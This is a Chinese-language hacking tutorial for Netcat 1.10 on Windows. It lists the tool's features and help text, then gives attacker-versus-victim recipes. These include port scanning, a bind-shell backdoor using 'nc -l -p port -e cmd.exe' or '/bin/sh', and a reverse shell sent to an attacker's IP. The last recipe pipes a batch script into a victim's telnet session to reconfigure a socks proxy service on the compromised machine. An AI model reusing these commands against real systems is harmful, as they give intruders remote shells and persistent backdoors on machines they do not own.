###################################################################### 1. Netcat 1.10 for NT - nc11nt.zip ###################################################################### Basic Features
* Outbound or inbound connections, TCP or UDP, to or from any ports * Full DNS forward/reverse checking, with appropriate warnings * Ability to use any local source port * Ability to use any locally-configured network source address * Built-in port-scanning capabilities, with randomizer * Can read command line arguments from standard inputb * Slow-send mode, one line every N seconds * Hex dump of transmitted and received data * Ability to let another program service established connections * Telnet-options responder
New for NT
* Ability to run in the background without a console window * Ability to restart as a single-threaded server to handle a new connection ________________________________________________________________________ Some of the features of netcat are:
Outbound or inbound connections, TCP or UDP, to or from any ports Full DNS forward/reverse checking, with appropriate warnings Ability to use any local source port Ability to use any locally-configured network source address Built-in port-scanning capabilities, with randomizer Built-in loose source-routing capability Can read command line arguments from standard input Slow-send mode, one line every N seconds Optional ability to let another program service inbound connections
Some of the potential uses of netcat:
Script backends Scanning ports and inventorying services Backup handlers File transfers Server testing and simulation Firewall testing Proxy gatewaying Network performance testing Address spoofing tests Protecting X servers 1001 other uses you`ll likely come up with
###################################################################### 2. Netcat 1.10 for NT 帮助信息 ###################################################################### C:\WINDOWS\Desktop>nc -h [v1.10 NT] connect to somewhere: nc [-options] hostname port[s] [ports] ... listen for inbound: nc -l -p port [options] [hostname] [port] options: -d detach from console, background mode (后台模式) -e prog inbound program to exec [dangerous!!] -g gateway source-routing hop point[s], up to 8 -G num source-routing pointer: 4, 8, 12, ... -h this cruft (本帮助信息) -i secs delay interval for lines sent, ports scanned (延迟时间) -l listen mode, for inbound connects (监听模式,等待连接) -L listen harder, re-listen on socket close (连接关闭后,仍然继续监听) -n numeric-only IP addresses, no DNS (ip数字模式,非dns解析) -o file hex dump of traffic (十六进制模式输出文件,三段) -p port local port number (本地端口) -r randomize local and remote ports (随机本地远程端口) -s addr local source address (本地源地址) -t answer TELNET negotiation -u UDP mode -v verbose [use twice to be more verbose] (-vv 更多信息) -w secs timeout for connects and final net reads -z zero-I/O mode [used for scanning] (扫描模式,-vv) port numbers can be individual or ranges: m-n [inclusive]
3.1.端口的刺探: nc -vv ip port RIVER [192.168.0.198] 19190 (?) open //显示是否开放open 3.2.扫描器 nc -vv -w 5 ip port-port port nc -vv -z ip port-port port 这样扫描会留下大量的痕迹,系统管理员会额外小心
3.3. 后门 victim machine: //受害者的机器 nc -l -p port -e cmd.exe //win2000 nc -l -p port -e /bin/sh //unix,linux attacker machine: //攻击者的机器. nc ip -p port //连接victim_IP,然后得到一个shell。
3.4.反向连接 attacker machine: //一般是sql2.exe,远程溢出,webdavx3.exe攻击. //或者wollf的反向连接. nc -vv -l -p port victim machine: nc -e cmd.exe attacker ip -p port nc -e /bin/sh attacker ip -p port
3.7 telnet,自动批处理。 ★★★★★我要重点推荐的东西就是这个. nc victim_ip port < path\file.cmd /*victim machine*/ 显示执行过程. nc -vv victim_ip port < path\file.cmd /*victim machine*/ 显示执行过程.
nc -d victim_ip port < path\file.cmd 安静模式.
_______________file.cmd________________________ password cd %windir% echo []=[%windir%] c: cd \ md test cd /d %windir%\system32\ net stop sksockserver snake.exe -config port 11111 net start sksockserver exit _______________file.cmd__END___________________
